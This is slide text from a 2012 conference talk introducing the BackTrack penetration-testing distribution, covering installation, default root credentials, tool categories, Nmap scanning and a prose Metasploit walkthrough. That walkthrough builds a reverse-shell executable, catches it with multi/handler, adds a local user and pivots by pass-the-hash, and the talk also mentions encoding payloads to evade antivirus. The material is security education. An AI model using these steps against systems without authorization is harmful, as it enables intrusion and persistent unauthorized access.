An Introduction to

Andrew Kozma Atlantic Security Conference 2012 www.atlseccon.com

What is BackTrack?
Based upon Ubuntu GNU/Linux Distribution Designed for Penetration Testing & Forensics Large collection of security-related tools ranging from port scanners to password crackers LiveCD distribution that is bootable from DVD/USB Developed and maintained by the team at OffensiveSecurity Current version is BackTrack 5 r2, kernel updated 02/24/12, ISO update 03/01/12 Free and always will be!

Why do I need BackTrack?

Based upon Ubuntu GNU/Linux Distribution Designed for Penetration Testing & Forensics Large collection of security-related tools ranging from port scanners to password crackers LiveCD distribution that is bootable from DVD/USB Developed and maintained by the team at OffensiveSecurity Current version is BackTrack 5 r2, kernel updated 02/24/12, ISO update 03/01/12 Free and always will be!

Getting started with BackTrack

Where to get it
http://www.backtrack-linux.org/downloads/

Non persistent installation

Write the .iso to DVD and boot from it Recommend USB-Universal-Installer to create a bootable thumb drive

BT5 Boot Menu

BT5 starts with networking enabled by default Previous versions of BackTrack did not boot with networking enabled If you need to be Ninja Select BackTrack Stealth from the boot menu

Logging into BackTrack the first time

First use
When booting from .iso you are automatically logged in as root Default username is root, default password is toor To launch the GUI enter startx *Note This is not a persistent install (Yet)

Persistent Installation
This is optional Easy as clicking install BackTrack from the desktop icon and following the prompts Can be installed on entire disk as primary OS Can be installed with other OS in a dual boot configuration Can be run as a virtual guest

Recommendations
Now that we have a persistent installation it is recommended to change the default root password Also take this opportunity to fix a WICD error Type reboot from terminal window

Launching the GUI

Login with the root account and the new password Enter startx to launch the GUI

Connecting to a WIFI Network

To connect to a wireless network Launch WICD from >Internet>WICD Select the WIFI network you wish to connect to and enter the appropriate security settings Status bar at the bottom indicates connected to and your IP address

Updating BackTrack with a script

Mad props to bl4ck5w4n for an awesome script! Use WGET to retrieve the tarball from the internet Extract the tarball Copy it to /bin directory Make it executable From terminal type bt5up and press enter

I have Backtrack now what?

Yep this is how I felt in the beginning Backtrack can do some bad things. Be careful where you point that thing Even though I know how to aim it guess what? I am still a monkey ( An extremely cool bad ass
monkey with Backtrack though!)

Tools are arranged into 12 categories

Information Gathering Vulnerability Assessment Exploitation Tools Privilege Escalation Maintaining Access Reverse Engineering RFID Tools Stress testing Forensics Reporting Tools Services Miscellaneous

Tools
The number of tools available can be intimidating The tools alone are not a means to an end Logically grouped based upon primary function Tactics and strategies (Pentest Methodology)

OSI Model (Attackers View)

Knowing what to use when Know how it impacts the stack and the network Picking the right tool to do the job Fundamental knowledge, to progress a clear grasp of this model is highly recommended

Scanning
The more information we gather the greater the chance of success Identify live hosts Identify OS Identify Services, banner grab Check for vulnerabilities Tool of Choice NMAP

Vulnerabilities & Exploits

Vulnerability A flaw or weakness in a system that can be exploited to cause a disruption in service and/or damage Exploit Software that takes advantage of a vulnerability to escalate privileges or disrupt service Overflow An error condition that occurs when a program is saving data beyond its capabilities Payload The code that runs on a system after it has been compromised

Metasploit
Free online course from the gang at Offensive-Security (Thanks guys this is awesome!) Does it all.. can scan, can check for vulnerabilities, can create your own payloads and it can deliver them MSFConsole is where most compromised hosts are managed

Maintaining Access

If you can get a user to run a payload for you there is no need to go through the trouble of exploiting any software (SET Social Engineers Toolset) Payloads can be encoded to aid in bypassing AV software

Reverse Shell

Append the msfpayload command with O to display the available options for the selected exploit

Reverse Shell

Compile the payload into an executable

Reverse Shell

Now that the exploit is ready to go we are going to utilize Multi/Handler to handle the exploit launched outside of the Metasploit framework

Reverse Shell

We need to tell the multi/handler what payload to expect so we configure it with the same settings that we used to compile the exploit

Reverse Shell

Now that everything is prepared we launch the attack with exploit The multi/handler handles the exploit and we have a reverse shell session to the remote host What access level does Jim have?

Moving on
With a reverse shell connection we have the same privilege level as Jim (Hope he is a local admin) Lets create a local user with our own password just for fun

The fun continues as we can now scan additional hosts and services from Jims workstation What level of access does Jim have on other workstations? (Pass the hash)

Documenting & Reporting

This is the work part and it separates the good from the decent You must be able to document your findings and present them to various levels of management It should include all steps taken to perform the exploit and also include recommendations for remediation/mitigation Pics or it didnt happen

Additional Resources
www.offensive-security.com Metasploit Unleashed Free online course www.backtrack-linux.org http://www.exploit-db.com/ http://www.exploit-db.com/google-dorks/ http://www.offensive-security.com/penetrationtesting-sample-report.pdf www.thehask.com Halifax Hack Lab (Speak to Travis Barlow)

Conclusion
Have basic unix command skill , try Kubuntu Take your time Pick a few tools and learn them well This is a continual process you will always be learning You have not failed until you stop trying

 Many thanks to the team at Offensive Security on being the first educational sponsor for The Atlantic Security Conference

Questions?